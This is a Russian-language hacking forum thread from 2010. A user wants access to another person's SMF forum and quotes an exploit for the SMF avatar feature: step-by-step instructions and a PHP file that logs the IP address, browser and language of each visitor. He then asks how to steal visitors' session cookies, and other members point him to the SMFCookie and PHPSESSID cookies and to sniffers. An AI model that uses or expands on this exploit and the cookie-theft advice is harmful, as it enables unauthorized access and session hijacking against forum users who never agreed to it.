Получить куки на SMF 1.1.18

Discussion in 'Болталка' started by br1tva, 20 Apr 2010.

  1. br1tva

    br1tva Elder - Старейшина

    Joined:
    26 Dec 2007
    Messages:
    23
    Likes Received:
    8
    Reputations:
    -5
    Значит нужен доступ к одному форуму , версия форума 1.1.18 .
    Нашел под форум exploit :

    Simple Machines Forum <= 1.1.8 (avatar) Remote PHP File Execute PoC

    - Step by Step:

    1) go to your profile in section of avatar.
    2) put the url of the malicious php file as avatar (ex: http://target/poc.php).
    3) create a new topic.

    - [victims] All the people that visit the topic will be infect.


    malicious file example [steal info]: (poc.php)


    PHP:
    <?php   $ip $_SERVER['REMOTE_ADDR'];   $so$_SERVER['HTTP_USER_AGENT'];   $lan$_SERVER['HTTP_ACCEPT_LANGUAGE'];   $url$_SERVER['PHP_SELF'];   $path$_SERVER['DOCUMENT_ROOT'];   $archivo 'hacks.txt';   $fp fopen($archivo"a");   $string "   Simple Machines Forum <= 1.1.8 (avatar) rpfe PoC       $path$url     VICTIM: $ip     info: $so   language: $lan       ";   $write fputs($fp$string);   fclose($fp);   ?>   
    Делаю все как указанно выше , на моем хосте в файл hacks.txt пишется Ип , Время , Дата и sysinfo . Возможно ли с помощью этого exploita тянуть куки зашедших в топик ???
     
  2. br1tva

    br1tva Elder - Старейшина

    Joined:
    26 Dec 2007
    Messages:
    23
    Likes Received:
    8
    Reputations:
    -5
    уп )) стил нид хелп .
     
  3. Godfather Bulan

    Godfather Bulan Elder - Старейшина

    Joined:
    18 Mar 2008
    Messages:
    172
    Likes Received:
    443
    Reputations:
    25
    ну так посмотри переменную PHPSESSID например или как там в SMF
     
  4. Chubakur

    Chubakur Member

    Joined:
    6 Apr 2009
    Messages:
    48
    Likes Received:
    12
    Reputations:
    0
    SMFCookie и PHPSESSID посмотри.
     
  5. br1tva

    br1tva Elder - Старейшина

    Joined:
    26 Dec 2007
    Messages:
    23
    Likes Received:
    8
    Reputations:
    -5
    Вплане SMFCookie и PHPSESSID посмотри ?? Можно немного поподробней ?? Я с куками 1 раз дело имею !!
     
  6. br1tva

    br1tva Elder - Старейшина

    Joined:
    26 Dec 2007
    Messages:
    23
    Likes Received:
    8
    Reputations:
    -5
    Народ , помогите нубику ))
     
  7. Godfather Bulan

    Godfather Bulan Elder - Старейшина

    Joined:
    18 Mar 2008
    Messages:
    172
    Likes Received:
    443
    Reputations:
    25
    ну посмотри в сторону снифаков